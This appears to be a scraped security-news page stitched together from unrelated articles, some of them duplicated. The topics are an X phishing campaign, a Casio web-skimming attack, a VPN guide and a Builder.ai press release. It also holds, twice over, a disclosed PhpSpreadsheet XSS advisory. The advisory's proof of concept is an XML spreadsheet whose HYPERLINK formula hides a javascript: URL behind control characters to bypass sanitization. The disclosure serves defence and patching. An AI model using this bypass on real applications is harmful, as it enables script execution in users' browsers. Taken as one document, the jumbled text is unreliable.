In an attack vector that's been used before, threat actors aim to commit crypto fraud by hijacking highly followed users, thus reaching a broad audience of secondary victims.

Source: Ronstik via Alamy Stock Photo

An active, one-click phishing campaign is targeting the X accounts of high-profile individuals — including journalists, political figures, and even an X employee — to hijack and exploit them to commit cryptocurrency fraud.

Researchers at SentinelLabs uncovered the campaign, which they said appears to be most prominent on X but is not limited to a single social media platform, they revealed in a recent blog post. The goal of attackers is ultimately to use the potential reach of the high-impact accounts — which also include technology and cryptocurrency organizations as well as owners of accounts with valuable, short usernames — to target people with crypto scams for financial gain, the researchers said.

"Once an account is taken over, the attacker swiftly locks out the legitimate owner and begins posting fraudulent cryptocurrency opportunities or links to external sites designed to lure additional targets, often with a crypto theft-related theme," SentinelLabs threat researchers Tom Hegel, Jim Walter, and Alex Delamotte wrote in the post.

Ultimately, this compromise of high-profile accounts — a tactic used before by cybercriminals, most notably in targeting celebrity Twitter accounts in 2020 — enables the attacker to reach a broader audience of potential secondary victims, maximizing their financial gains, the researchers noted.

Related:Can AI & the Cyber Trust Mark Rebuild Endpoint Confidence?

Indeed, the campaign is also similar to one uncovered last year that compromised the Linux Tech Tips X account along with other high-profile users. The researchers discovered related infrastructure and similar phishing messages used in both campaigns, evidence that suggests the same threat actor is behind both, they said. However, at this time it's not known from which region of the world the actor hails, or who might be behind the campaign.

**Classic Fake Crypto Lures & Adaptable Infrastructure**

SentinelLabs observed a variety of phishing lures being used in the campaign, including a "classic account login notice" that targets people with an email informing them that someone logged into their account from a new device. The email includes a link suggesting they "take steps to protect" their account which actually leads to a site that phishes X credentials, according to the post.

Other email-based lures use copyright-violation themes to get users to click on a phishing page that ask them to enter their X credentials. In recent cases, the phishing page to which victims were redirected abused Google’s “AMP Cache” domain cdn.ampproject\[.\]org to evade common email detections, according to SentinelLabs.

Related:PrintNightmare Aftermath: Windows Print Spooler Is Better. What's Next?

Infrastructure used in the account suggests that the actor behind the campaign is "highly adaptable, continuously exploring new techniques while maintaining a clear financial motive," the researchers wrote.

Recent activity used the domain securelogins-x\[.\]com to deliver emails and x-recoverysupport\[.\]com to host phishing pages. As "any of these domains can be considered email delivery or phishing-page hosting," the activity indicates "a level of informality and flexibility of infrastructure use," the researchers observed.

Attackers also hosted a flurry of recent activity on an IP associated with a Belize-based VPS service called Dataclub. The domains associated with the campaign have been predominantly registered through Turkish hosting provider Turkticaret, but this alone is not enough to confirm that the attackers are from Turkey, the researchers added.

**Protect Your Corporate Social Accounts**

High-profile X accounts are often targets for threat actors because controlling them can help them reach a wider audience with fraudulent activity. Often this activity involves crypto scams aimed at financial fraud, such as a case last year in which security firm Mandiant temporarily lost control of its X account to cryptocurrency drainer malware operators.

Related:Unpatched Zyxel CPE Zero-Day Pummeled by Cyberattackers

"The cryptocurrency landscape offers financially-motivated threat actors multiple opportunities for profit and fraud," the researchers noted in the post. "While marketing for coins and tokens has long been irreverent and meme-driven, recent developments have further blurred the line between legitimate projects and scams."

To protect an X account, the researchers recommended the obvious: users should maintain good password hygiene by using a unique password, enabling two-factor authentication (2FA), and avoiding credential sharing with third-party services.

People also should be especially wary of messages containing links to account alerts or security notices, and always verify URLs before clicking on them. If their accounts do need a password reset for security purposes, these should be initiated only directly through the official website or app rather than relying on unsolicited links, the researchers advised.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

1-Click Phishing Campaign Targets High-Profile X Accounts

TechTarget and Informa Tech’s Digital Business Combine.TechTarget and Informa

**TechTarget and Informa Tech’s Digital Business Combine.**

Together, we power an unparalleled network of 220+ online properties covering 10,000+ granular topics, serving an audience of 50+ million professionals with original, objective content from trusted sources. We help you gain critical insights and make more informed decisions across your business priorities.

*   Home
*   Events
*   Black Hat USA

Black Hat USA

Aug 2, 2025 TO Aug 7, 2025

|

Mandalay Bay Convention Center, Las Vegas, USA

Ready to level up your cybersecurity knowledge? Join us at the industry’s top cybersecurity event, where professionals and hackers of all levels gather to learn the latest risks, research, and trends in information security. Black Hat USA features top cybersecurity experts from across the globe, delivering their cutting-edge work and discoveries in a welcoming, vendor-neutral atmosphere. Don't miss out on this must-attend event!

**Editor's Choice**

Reports

*   The State of Firewall Security: Challenges, Risks, and Solutions for Modern Networks
    
    Jan 10, 2025
*   Industrial Networks in the Age of Digitalization
    
    Jan 6, 2025
*   Zero-Trust Adoption Driven by Data Protection, Cloud Access Control, and Regulatory Compliance Requirements
    
    Jan 6, 2025
*   Threat Hunting's Evolution: From On-Premises to the Cloud
    
    Jan 6, 2025
*   How Enterprises Secure Their Applications
    
    Jan 6, 2025

Webinars

*   Uncovering Threats to Your Mainframe & How to Keep Host Access Secure
    
    Feb 13, 2025
*   Securing the Remote Workforce
    
    Feb 20, 2025
*   Emerging Technologies and Their Impact on CISO Strategies
    
    Feb 25, 2025
*   How CISOs Navigate the Regulatory and Compliance Maze
    
    Feb 26, 2025
*   Where Does Outsourcing Make Sense for Your Organization?
    
    Feb 27, 2025

White Papers

*   Driving the Future of Work Through Enterprise-Wide SASE
    
*   4 Best Practices for Hybrid Security Policy Management
    
*   Social Engineering: New Tricks, New Threats, New Defenses
    
*   Understanding Social Engineering Attacks and What To Do About Them
    
*   Solution Brief: Introducing the runZero Platform
    

Events

*   Black Hat USA - August 2-7 - Learn More
    
    Aug 2, 2025
*   Black Hat Asia - April 1-4 - Learn More
    
    Apr 1, 2025
*   Cybersecurity's Most Promising New and Emerging Technologies
    
    Mar 20, 2025

Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Black Hat USA

**Product:** PhpSpreadsheet
**Version:** 3.8.0
**CWE-ID:** CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
**CVSS vector v.3.1:** 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)
**CVSS vector v.4.0:** 4.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N)
**Description:** an attacker can use special characters, so that the library processes the javascript protocol with special characters and generates an HTML link
**Impact:** executing arbitrary JavaScript code in the browser
**Vulnerable component:** class `PhpOffice\PhpSpreadsheet\Writer\Html`, method `generateRow`
**Exploitation conditions:** a user viewing a specially generated xml file
**Mitigation:** additional sanitization of special characters in a string
**Researcher: Igor Sak-Sakovskiy (Positive Technologies)**

# Research

The researcher discovered zero-day vulnerability Bypass XSS sanitizer using the javascript protocol and special characters in Phpspreadsheet.
The following code is written on the server, which translates the XML file into an HTML representation and displays it in the response.

*Listing 4. Source code on the server*

```
<?php

require __DIR__ . '/vendor/autoload.php';

$inputFileType = 'Xml';
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader($inputFileType);  

$inputFileName = './doc/file.xml';
$spreadsheet = $reader->load($inputFileName); 
 
$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet); 
print($writer->generateHTMLAll());
```
The contents of the xml file - `./doc/file.xml`

*Listing 5. The contents of the xml file*
```
<?xml version="1.0"?> 
<?mso-application progid="Excel.Sheet"?> 
<Workbook xmlns="urn:schemas-microsoft-com:office:spreadsheet" 
 xmlns:o="urn:schemas-microsoft-com:office:office" 
 xmlns:x="urn:schemas-microsoft-com:office:excel" 
 xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet" 
 xmlns:html="http://www.w3.org/TR/REC-html40"> 
 <DocumentProperties xmlns="urn:schemas-microsoft-com:office:office"> 
  <Author>author</Author> 
  <LastAuthor>author</LastAuthor> 
  <Created>2015-06-05T18:19:34Z</Created> 
  <LastSaved>2024-12-25T10:16:07Z</LastSaved> 
  <Version>16.00</Version> 
 </DocumentProperties> 
 <OfficeDocumentSettings xmlns="urn:schemas-microsoft-com:office:office"> 
  <AllowPNG/> 
 </OfficeDocumentSettings> 
 <ExcelWorkbook xmlns="urn:schemas-microsoft-com:office:excel"> 
  <WindowHeight>11020</WindowHeight> 
  <WindowWidth>19420</WindowWidth> 
  <WindowTopX>32767</WindowTopX> 
  <WindowTopY>32767</WindowTopY> 
  <ProtectStructure>False</ProtectStructure> 
  <ProtectWindows>False</ProtectWindows> 
 </ExcelWorkbook> 
 <Styles> 
  <Style ss:ID="Default" ss:Name="Normal"> 
   <Alignment ss:Vertical="Bottom"/> 
   <Borders/> 
   <Font ss:FontName="Calibri" x:Family="Swiss" ss:Size="11" ss:Color="#000000"/> 
   <Interior/> 
   <NumberFormat/> 
   <Protection/> 
  </Style> 
  <Style ss:ID="s16"> 
   <NumberFormat ss:Format="General Date"/> 
  </Style> 
 </Styles> 
 <Worksheet ss:Name="Лист1"> 
  <Table ss:ExpandedColumnCount="2" ss:ExpandedRowCount="6" x:FullColumns="1" 
   x:FullRows="1" ss:DefaultRowHeight="14.5"> 
   <Column ss:AutoFitWidth="0" ss:Width="194"/> 
   <Row> 
     <Cell ss:Formula="=HYPERLINK (CHAR(20) &amp; &quot;j&quot; &amp; CHAR(13) &amp; &quot;avascript:alert(1)&quot;)"><Data ss:Type="String"></Data></Cell> 
   </Row> 
  </Table> 
  <WorksheetOptions xmlns="urn:schemas-microsoft-com:office:excel"> 
   <PageSetup> 
    <Header x:Margin="0.3"/> 
    <Footer x:Margin="0.3"/> 
    <PageMargins x:Bottom="0.75" x:Left="0.7" x:Right="0.7" x:Top="0.75"/> 
   </PageSetup> 
   <Selected/> 
   <TopRowVisible>1</TopRowVisible> 
   <Panes> 
    <Pane> 
     <Number>3</Number> 
     <ActiveRow>6</ActiveRow> 
    </Pane> 
   </Panes> 
   <ProtectObjects>False</ProtectObjects> 
   <ProtectScenarios>False</ProtectScenarios> 
  </WorksheetOptions> 
 </Worksheet>
</Workbook>
```

Due to the load with a special character in front of the javascript protocol, the execution flow hits line 1595, not 1593.
 
*Figure 4. Generating a link bypassing a regular expression*
![fig4](https://github.com/user-attachments/assets/9bd2299d-9045-4cab-b3a5-cbcaf3bbe23c)

In the response from the server, you can see which special character is located in front of the javascript protocol after conversion.
 
*Figure 5. Response from the server with a special character*
![fig5](https://github.com/user-attachments/assets/3fecbd9b-b08e-4797-9f5d-06911f857059)

When viewing the rendered result, a link becomes visible in the browser, and when clicked, the embedded JavaScript code will be executed.

*Figure 6. Executing JavaScript code*
<img width="595" alt="fig6" src="https://github.com/user-attachments/assets/b8ff1aeb-ba3b-49c1-a3b4-9e2cc1fc52d1" />
_____________________________________________

## Credit

Igor Sak-Sakovskiy (Positive Technologies)


**Product:** PhpSpreadsheet  
**Version:** 3.8.0  
**CWE-ID:** CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')  
**CVSS vector v.3.1:** 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)  
**CVSS vector v.4.0:** 4.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N)  
**Description:** an attacker can use special characters, so that the library processes the javascript protocol with special characters and generates an HTML link  
**Impact:** executing arbitrary JavaScript code in the browser  
**Vulnerable component:** class PhpOffice\PhpSpreadsheet\Writer\Html, method generateRow  
**Exploitation conditions:** a user viewing a specially generated xml file  
**Mitigation:** additional sanitization of special characters in a string  
**Researcher: Igor Sak-Sakovskiy (Positive Technologies)**

**Research**

The researcher discovered zero-day vulnerability Bypass XSS sanitizer using the javascript protocol and special characters in Phpspreadsheet.  
The following code is written on the server, which translates the XML file into an HTML representation and displays it in the response.

_Listing 4. Source code on the server_

    <?php
    
    require __DIR__ . '/vendor/autoload.php';
    
    $inputFileType = 'Xml';
    $reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader($inputFileType);  
    
    $inputFileName = './doc/file.xml';
    $spreadsheet = $reader->load($inputFileName); 
     
    $writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet); 
    print($writer->generateHTMLAll());
    

The contents of the xml file - ./doc/file.xml

_Listing 5. The contents of the xml file_

    <?xml version="1.0"?> 
    <?mso-application progid="Excel.Sheet"?> 
    <Workbook xmlns="urn:schemas-microsoft-com:office:spreadsheet" 
     xmlns:o="urn:schemas-microsoft-com:office:office" 
     xmlns:x="urn:schemas-microsoft-com:office:excel" 
     xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet" 
     xmlns:html="http://www.w3.org/TR/REC-html40"> 
     <DocumentProperties xmlns="urn:schemas-microsoft-com:office:office"> 
      <Author>author</Author> 
      <LastAuthor>author</LastAuthor> 
      <Created>2015-06-05T18:19:34Z</Created> 
      <LastSaved>2024-12-25T10:16:07Z</LastSaved> 
      <Version>16.00</Version> 
     </DocumentProperties> 
     <OfficeDocumentSettings xmlns="urn:schemas-microsoft-com:office:office"> 
      <AllowPNG/> 
     </OfficeDocumentSettings> 
     <ExcelWorkbook xmlns="urn:schemas-microsoft-com:office:excel"> 
      <WindowHeight>11020</WindowHeight> 
      <WindowWidth>19420</WindowWidth> 
      <WindowTopX>32767</WindowTopX> 
      <WindowTopY>32767</WindowTopY> 
      <ProtectStructure>False</ProtectStructure> 
      <ProtectWindows>False</ProtectWindows> 
     </ExcelWorkbook> 
     <Styles> 
      <Style ss:ID="Default" ss:Name="Normal"> 
       <Alignment ss:Vertical="Bottom"/> 
       <Borders/> 
       <Font ss:FontName="Calibri" x:Family="Swiss" ss:Size="11" ss:Color="#000000"/> 
       <Interior/> 
       <NumberFormat/> 
       <Protection/> 
      </Style> 
      <Style ss:ID="s16"> 
       <NumberFormat ss:Format="General Date"/> 
      </Style> 
     </Styles> 
     <Worksheet ss:Name="Лист1"> 
      <Table ss:ExpandedColumnCount="2" ss:ExpandedRowCount="6" x:FullColumns="1" 
       x:FullRows="1" ss:DefaultRowHeight="14.5"> 
       <Column ss:AutoFitWidth="0" ss:Width="194"/> 
       <Row> 
         <Cell ss:Formula="=HYPERLINK (CHAR(20) &amp; &quot;j&quot; &amp; CHAR(13) &amp; &quot;avascript:alert(1)&quot;)"><Data ss:Type="String"></Data></Cell> 
       </Row> 
      </Table> 
      <WorksheetOptions xmlns="urn:schemas-microsoft-com:office:excel"> 
       <PageSetup> 
        <Header x:Margin="0.3"/> 
        <Footer x:Margin="0.3"/> 
        <PageMargins x:Bottom="0.75" x:Left="0.7" x:Right="0.7" x:Top="0.75"/> 
       </PageSetup> 
       <Selected/> 
       <TopRowVisible>1</TopRowVisible> 
       <Panes> 
        <Pane> 
         <Number>3</Number> 
         <ActiveRow>6</ActiveRow> 
        </Pane> 
       </Panes> 
       <ProtectObjects>False</ProtectObjects> 
       <ProtectScenarios>False</ProtectScenarios> 
      </WorksheetOptions> 
     </Worksheet>
    </Workbook>
    

Due to the load with a special character in front of the javascript protocol, the execution flow hits line 1595, not 1593.

_Figure 4. Generating a link bypassing a regular expression_  

In the response from the server, you can see which special character is located in front of the javascript protocol after conversion.

_Figure 5. Response from the server with a special character_  

When viewing the rendered result, a link becomes visible in the browser, and when clicked, the embedded JavaScript code will be executed.

_Figure 6. Executing JavaScript code_  

**Credit**

Igor Sak-Sakovskiy (Positive Technologies)

**References**

*   GHSA-r57h-547h-w24f
*   PHPOffice/PhpSpreadsheet@cde2926

GHSA-r57h-547h-w24f: PhpSpreadsheet allows bypassing of XSS sanitizer using the javascript protocol and special characters

By integrating security into CI/CD, applying automated policies, and supporting developers with the right processes and tools, infosec teams can increase efficiency and build secure software.

Remi Yazigi, Information Security Engineer, Cisco Systems

February 3, 2025

4 Min Read

Source: Cagkan Sayin via Alamy Stock Photo

COMMENTARY

As cyber threats grow more sophisticated, organizations must prioritize secure software development practices. Vulnerability management is a critical aspect of this, but its success depends on clear ownership and collaboration between information security and engineering teams. By shifting left and embedding vulnerability management into the development life cycle, organizations can empower engineering teams to deliver secure code efficiently. Here's how infosec teams can drive this transformation.

**Shifting Left: The Key to Proactive Security**

Traditional vulnerability management approaches often focus on addressing issues post-deployment. This reactive strategy slows development and increases the risk of exposure. Shifting left means identifying and remediating vulnerabilities earlier in the development process, during the build phase, or even before code reaches the repository. This early action reduces cost and effort while improving the quality of the codebase.

By integrating vulnerability scanning tools like Trivy into continuous integration and continuous delivery (CI/CD) pipelines, infosec teams can block builds that introduce known vulnerabilities. Tools like these, with seamless integration with GitHub Actions (GHA) and Jenkins, provide immediate feedback to developers. When vulnerabilities are identified, engineers can address them without disrupting the workflow. This approach not only enhances security but also fosters a culture of accountability and ownership among developers.

**Applying Policies for Image Promotion**

One of the most effective ways to enforce security practices is through automated policies for container image promotion. For example:

1.  Base images: Ensure that development teams use only approved base images vetted by information security. These images should be regularly updated to incorporate security patches and align with organizational standards.
    
2.  Docker registries: Restrict usage to trusted and approved registries, reducing the risk of introducing malicious or outdated images. Approved registries should provide regular scans and metadata to verify image integrity.
    
3.  Image scanning: Automate the scanning process for all container images before they are promoted to staging or production environments. By applying strict vulnerability gates, organizations can ensure only secure images progress through the pipeline. Coupled with regular rescanning of images in production, this practice maintains security over time.
    

**Handling Exceptions Transparently**

No vulnerability management strategy is complete without a robust mechanism for handling exceptions. infosec teams should provide engineering teams with a clear process to request and manage exceptions when immediate fixes are not feasible. This includes:

*   Time-bound exceptions: Set expiry dates for exceptions to ensure vulnerabilities are addressed within a reasonable time frame. Expired exceptions should trigger reminders and escalate unresolved issues.
    
*   Approval workflow: Establish an approval workflow that involves both engineering and infosec stakeholders. Collaboration ensures balanced decisions that consider security and business needs.
    
*   Documentation: Require detailed justifications for exceptions, including mitigation strategies, impact assessments, and follow-up plans. Documentation enables transparency and ensures accountability for all stakeholders.
    

By managing exceptions transparently, organizations can balance security requirements with operational realities while maintaining accountability. This process also offers an opportunity for continuous improvement by identifying recurring vulnerabilities or patterns requiring systemic fixes.

**Building a Collaborative Framework**

For vulnerability management to succeed, infosec and engineering teams must work in harmony. Information security teams can support engineering teams by:

1.  Providing tools and training: Offer developers access to easy-to-use security tools and training on secure coding practices. This training should emphasize real-world examples.
    
2.  Defining clear policies: Develop and document policies that align with engineering workflows, ensuring that security requirements are achievable without disrupting productivity. Regularly review these policies to adapt to evolving threats and technologies.
    
3.  Creating feedback loops: Establish feedback mechanisms to address false positives, improve tool configurations, and enhance the developer experience. Prompt feedback helps developers focus on genuine risks and encourages compliance with security measures.
    
4.  Encouraging shared metrics: Track shared security metrics that matter to both teams, such as vulnerability closure rates and build success rates. Shared goals foster collaboration and build a sense of collective responsibility.
    

**Leveraging Automation and Metrics**

Automation plays a pivotal role in ensuring the scalability and reliability of vulnerability management processes. Integrating tools for automated scanning, ticket generation, and remediation tracking saves time and reduces human error. Meanwhile, metrics such as mean time to resolution (MTTR) and the number of vulnerabilities detected per build provide valuable insights into program effectiveness and areas for improvement.

**The Path Forward**

Empowering engineering teams with ownership of vulnerability management is a cultural shift that requires effort and collaboration. By integrating security into the CI/CD pipeline, applying automated policies, and supporting developers with clear processes and tools, infosec teams can drive efficiency and foster a shared commitment to building secure software.

Organizations that embrace this approach will not only reduce risk but also enhance their ability to deliver secure and reliable applications at scale. The time to shift left is now. Success requires a proactive mindset, the right tools, and above all, a strong partnership between infosec and engineering teams.

**About the Author**

Information Security Engineer, Cisco Systems

Remi Yazigi is information security engineer for Cisco Systems. He has extensive experience in cloud and container vulnerability management, specializing in automation to enhance security workflows. He holds two master’s degrees in computer engineering and cybersecurity and forensics. He joined ThousandEyes in London in 2018 and moved to the US in 2022 after Cisco Systems acquired ThousandEyes in 2020. There, he lead efforts to improve vulnerability detection and remediation. Prior to that, he worked in France as a cybersecurity consultant, focusing on securing industrial systems, including projects such as Ariane 5 space rocket and SECOIA. He is passionate about empowering engineering teams to take ownership of security processes, ensuring resilient and secure infrastructures. His expertise lies in creating scalable, efficient solutions that address modern security challenges.

Proactive Vulnerability Management for Engineering Success

Dubai UAE, UAE, 3rd February 2025, CyberNewsWire

**Dubai UAE, UAE, February 3rd, 2025, CyberNewsWire**

Artificial Intelligence (AI) is widely recognized for its potential to impact industries and everyday life. Yet, access to AI-driven tools and development has often been confined to tech-savvy enterprises with significant financial resources. Builder.ai, however, is challenging this paradigm by democratizing AI for the next billion users. Its mission is to make AI-driven development accessible and affordable for underrepresented markets and developing countries, fostering innovation and inclusion in a rapidly digitalizing world.

**Bridging the Digital Divide**

In many developing areas, technological progress is hindered by the lack of resources, infrastructure, or expertise. Often, businesses or entrepreneurs in these locations find it tough to get in touch with any advanced tools for constructing software or utilising AI for any application. Builder.ai can bridge this gap by offering software development on a platform that lowers the cost and makes this process easy.

At the heart of the mission of Builder.ai is a belief that innovation should not be limited by geography, budget, or technical know-how. Users can create applications without writing a single line of code on its platform.

By automating much of the development process and using pre-built components, Builder.ai reduces costs and accelerates time-to-market—critical factors for startups and small businesses in resource-constrained environments.

**AI-Powered Accessibility**

Builder.ai’s platform leverages AI to streamline the development journey. From ideation to deployment, AI is at the heart of process optimization, predicting user needs, and delivering customized solutions. For example, its AI assistant, Natasha, assists users in articulating their requirements so that they are clearly stated and there is less chance of error. This is a goldmine for entrepreneurs in developing countries who do not have technical skills but have transformational ideas.

The transparency of pricing on the platform further eliminates barriers. Builder.ai allows users to plan their budgets effectively through upfront cost estimates, thus eliminating the financial unpredictability often associated with traditional software development. This feature is particularly beneficial for small businesses and startups in underrepresented markets, where financial resources are limited.

**Empowering Local Entrepreneurs**

Builder.ai has facilitated the development of many local entrepreneurs. Even small and medium enterprises all around the world that are working as the backbone of economies have at times been hindered due to technology disparities. Builder.ai has helped in alleviating this problem through the provision of a low-cost and user-friendly development platform.

**Supporting Public Sector Initiatives**

The mission of Builder.ai is not only limited to the private sector. In developing countries, governments and non-profit organizations require customized software for health care, education, and public services. However, limited budgets and technical constraints prevent them from implementing such solutions. Builder.ai opens a way out of these difficulties.

**Scaling for the Future**

The more digital adoption accelerates globally, the higher will be the demand for accessible AI-driven tools. Its scalable platform puts Builder.ai in a position to capitalize on that, especially in developing regions where the next wave of digital users will emerge. Its pay-as-you-go model allows businesses to scale their applications as they grow without incurring the usually prohibitive costs.

To supplement this, it emphasizes education and training to create a maximizer out of any user on Builder.ai. Aiding with any knowledge and tools means the company assists in using its platform by such underrepresented-market users, engendering that feel of innovation towards self-reliance.

**Transforming the Global Landscape**

The commitment of Builder.ai towards democratizing AI also means more than technology it depicts a more inclusive and equitable digital landscape. It’s enabling individuals and organizations to realize their potential, irrespective of where they are or how much they have, toward making AI-driven development accessible to the next billion users. Democratization holds far-reaching implications from boosting local economies to battling global challenges through innovative solutions.

Moving ahead with Builder.ai, its footprint on underrepresented markets and developing countries will surely symbolize the future transformation that is technology. Breaks down all barriers and opens opportunities for its customers, creating a better tomorrow by building much-needed software aiming to benefit all human beings.

**About Builder.ai**

Builder.ai is a technology company that makes AI-driven software development accessible and affordable. Its platform enables users to create applications without coding expertise, reducing costs and accelerating digital transformation. By supporting startups, small businesses, and public sector initiatives, Builder.ai fosters innovation in underrepresented markets and developing countries.

For more information, users can visit: https://www.builder.ai/

**Contact**

**Stephanie Lowenthal**  
**Builder.ai**  
**\[email protected\]**

How Builder.ai is Democratizing AI for the Next Billion Users

A list of topics we covered in the week of January 27 to February 2 of 2025

January 31, 2025 - Social engineering methods are being put to the test to distribute malware.

January 31, 2025 - Law enforcement took down several cybercrime forums that sold tools and data to other cybercriminals

January 30, 2025 - Just days after we uncovered a campaign targeting Google Ads accounts, a similar attack has surfaced, this time aimed at Microsoft...

January 30, 2025 - The sudden rise of DeepSeek has raised questions of data origin, data destination, and the security of the new AI model.

January 29, 2025 - Data analysis has shown which 4-digit pin codes offer the best chances for an attacker. Are you using one of them?

 A week in security (January 27 &#8211; February 2) 

The Importance of Balancing Cost and Security!

Finding a virtual private network (VPN) that offers complete privacy protection without breaking the bank might be difficult when worries about online privacy are growing. Many users must decide between paying for premium VPNs, which are usually expensive, and using free services that can **jeopardize their data**.

However, what if you could locate a reasonably priced service with robust privacy features? The top VPNs that ideally balance cost and security. Whether streaming, torrenting, or safeguarding your online presence, these options are tailored to meet your needs without breaking the bank. The key considerations for choosing a VPN are to explore the best budget-friendly options available today.

****Key Features to Look for in a Secure VPN****

When privacy is a concern, knowing which features are most important is fundamental because not all VPNs are equal. For example, any trustworthy **VPN** must-have military-grade encryption to shield your data from prying eyes. Protocols like OpenVPN or WireGuard ensure secure and efficient connections, and a strict no-logs policy keeps your browsing activity private.

The user experience can be improved by features like a kill switch, DNS leak protection, and multi-device compatibility. Transparency is essential for those worried about privacy; look for suppliers whose claims have been independently audited.

These fundamental capabilities are still available in low-cost VPNs, demonstrating that economy need not equate to sacrificing quality. By prioritizing these factors, you can ensure your VPN satisfies strict security requirements while remaining within your budget.

****Top Affordable VPNs for Streaming and Torrenting****

Streaming and torrenting are two of the most popular reasons individuals seek VPNs. However, these activities require a service with particular features, such as avoiding geo-restrictions and preserving quick, reliable connections. Cheap VPNs like NordVPN and Surfshark are excellent choices for these purposes.

While NordVPN offers dedicated P2P servers for torrenting, Surfshark allows unlimited device connections, making it perfect for families or individuals with many devices. Both providers can unblock well-known **streaming services** like Netflix and Hulu thanks to SmartDNS capability.

These VPNs demonstrate flawless streaming and safe torrenting, which is possible without breaking the bank. Purchasing a reasonably priced VPN with strong features might improve your online experience without compromising privacy.

****Evaluating Privacy Policies: No-Logs and Transparency****

Examining a VPN’s privacy policies is essential when selecting one. A “no-logs” policy guarantees that your actions stay anonymous by preventing the supplier from storing your browsing data. But not every no-log assertion is made equally.

To ensure transparency, choose VPNs that third parties audit, such as ExpressVPN and CyberGhost. These suppliers have demonstrated their commitment to protecting their customers’ privacy by permitting independent companies to audit their systems. 

The jurisdiction in which the VPN works should also be taken into account. Services based in privacy-friendly countries like Switzerland or the British Virgin Islands are not subject to invasive data retention laws. A transparent and reliable VPN policy is non-negotiable for privacy-conscious users; even budget-friendly options can meet these stringent standards.

****Practical Use Cases: Everyday Benefits of a Secure VPN****

More than just a tool for techies, a secure VPN is useful for regular users. A VPN lowers the danger of hacking by protecting private information on public Wi-Fi networks for frequent travellers. VPNs allow remote employees to safely access corporate networks without disclosing sensitive data.

Because a VPN protects users from online tracking and invasive advertisements, even casual internet users can benefit from increased privacy. Those with limited funds can use inexpensive VPNs like ProtonVPN and Windscribe because they provide free tiers with strong security features. Using a secure VPN to stream, shop online, or get around censorship guarantees that your digital activities stay private and protected.

****Affordable Privacy is Within Reach****

Finding a **cheap VPN** that meets your spending limit doesn’t have to be complicated. Concentrating on essential features like encryption, no-logs policies, and multi-device support may give you strong privacy without exceeding budget. Affordability and security can coexist, as shown by services like Surfshark, NordVPN, and ProtonVPN, which serve a range of use cases from streaming to regular online safety.

Accept the comfort of protecting your digital footprint while adhering to your spending plan. Users concerned about their privacy can browse the internet with confidence and security if they have the correct VPN.

Cheap Yet Secure: Top VPNs for Privacy-Conscious Users on a Budget

Researchers uncover a double-entry website skimming attack targeting Casio and 16 other sites. Learn how cybercriminals exploited vulnerabilities to steal sensitive payment data and evade detection.

A recent investigation has revealed a significant web skimming campaign affecting at least 17 websites, including the UK site of electronics giant **Casio**. Researchers uncovered these infections, likely stemming from vulnerabilities in Magento or similar e-commerce platforms, and are working to notify all affected parties.  

Client-side web security provider, Jscrambler, has published exclusive details about a **web skimmer infection** that impacted electronic brand Casio’s UK website and 16 additional victims, and detected on January 28. 

Researcher Pedro Fortuna with David Alves and Pedro Marrucho, wrote in the blog post, shared with Hackread.com, that the skimmer used a double-entry web skimming attack. Victims reportedly loaded a script from the same Russian hosting provider, suggesting the use of a web skimming toolkit. 

Further probing revealed that the skimmer infections likely originated due to vulnerable components in Magento webstores. Some hosting domains had a long history, even 16 years back, suggesting attackers exploited the reputation of older, potentially defunct domains.

Interestingly, unlike typical skimmers that target checkout pages, this one targeted the cart page. It intercepted the _checkout_ button click and presented users with a fake, multi-step payment form within a pop-up window. This form collected sensitive information like names, billing addresses, contact details, and credit card information.

According to researchers’ **blog post**, after submitting this fake form, users received an error message and were redirected to the legitimate checkout page and forced to enter their payment details twice – a tactic known as double-entry skimming. 

Due to a flaw in the skimmer’s design users who clicked “buy now” instead of “add to basket” were not affected. The script, however, displayed a sophisticated detection evasion technique, preventing it from being returned by the skimming server in certain situations, a technique Jscrambler researchers have observed repeatedly.

Skimmer on Casio UK site (left) – Fake form stealing payment data (right) – Via Jscrambler Research team

The attack on Casio UK involved a two-stage skimmer. The initial loader, unusually un-obfuscated, was designed to blend in as a typical third-party script. This loader then injected a more complex, obfuscated second-stage skimmer. This second-stage skimmer employed techniques like custom encoding and XOR-based string concealment to evade detection.

The stolen data was encrypted using AES-256-CBC before exfiltration. Researchers were able to decrypt the data using the key and initialization vector (IV) included in the exfiltration request. The exfiltrated information included a full range of sensitive data, from billing addresses and contact details to complete credit card information. 

The Casio UK infection, active between January 14th and 24th, was addressed within 24 hours of the company being alerted. Research revealed that Casio UK’s Content Security Policy (CSP) was ineffective in preventing an attack due to its configuration to report-only mode and lack of proper reporting mechanisms.

“The casio.co.uk skimming incident attests that although Content Security Policy (CSP) is a relatively simple standard, it’s often considered hard to manage. It is easy to make mistakes, which often leads to companies opting for a report only over blocking, which also takes away a significant portion of the benefit,” researchers concluded.

Casio and 16 Other Websites Hit by Double-Entry Web Skimming Attack

Plus: WhatsApp discloses nearly 100 targets of spyware, hackers used the AT&T breach to hunt for details on US politicians, and more.

The rapid rise of DeepSeek, a Chinese generative AI platform, heightened concerns this week over the United States’ AI dominance as Americans increasingly adopt Chinese-owned digital services. With ongoing criticism over alleged security issues posed by TikTok’s relationship to China, DeepSeek’s own privacy policy confirms that it stores user data on servers in the country.

